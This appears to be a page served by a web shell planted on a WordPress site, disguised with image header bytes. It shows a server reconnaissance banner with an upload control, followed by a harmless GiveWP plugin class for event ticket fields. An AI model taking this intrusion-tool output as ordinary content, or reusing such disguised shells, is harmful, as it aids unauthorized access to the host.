????JFIF??x?x????'
Server IP : 104.21.32.1 / Your IP : 216.73.216.145 Web Server : LiteSpeed System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 User : tempvsty ( 647) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/tempvsty/./pontiacques.org/wp-content/plugins/give/src/EventTickets/Fields/ |
Upload File : |
<?php namespace Give\EventTickets\Fields; use Give\Framework\FieldsAPI\Field; class EventTickets extends Field { protected $title; protected $description; protected $startDateTime; protected $endDateTime; protected $ticketTypes = []; const TYPE = 'eventTickets'; /** * @since 3.6.0 */ public function getTitle(): string { return $this->title; } /** * @since 3.6.0 */ public function title(string $title): EventTickets { $this->title = $title; return $this; } /** * @since 3.6.0 */ public function getStartDateTime(): string { return $this->startDateTime; } /** * @since 3.6.0 */ public function startDateTime(string $date): EventTickets { $this->startDateTime = $date; return $this; } /** * @since 3.6.0 */ public function getEndDateTime(): string { return $this->endDateTime; } /** * @since 3.20.0 */ public function endDateTime(string $date): EventTickets { $this->endDateTime = $date; return $this; } /** * @since 3.6.0 */ public function getDescription(): string { return $this->description; } /** * @since 3.6.0 */ public function description(string $description): EventTickets { $this->description = $description; return $this; } /** * @since 3.6.0 */ public function getTicketTypes(): array { return $this->ticketTypes; } /** * @since 3.6.0 */ public function ticketTypes(array $ticketTypes): EventTickets { $this->ticketTypes = $ticketTypes; return $this; } }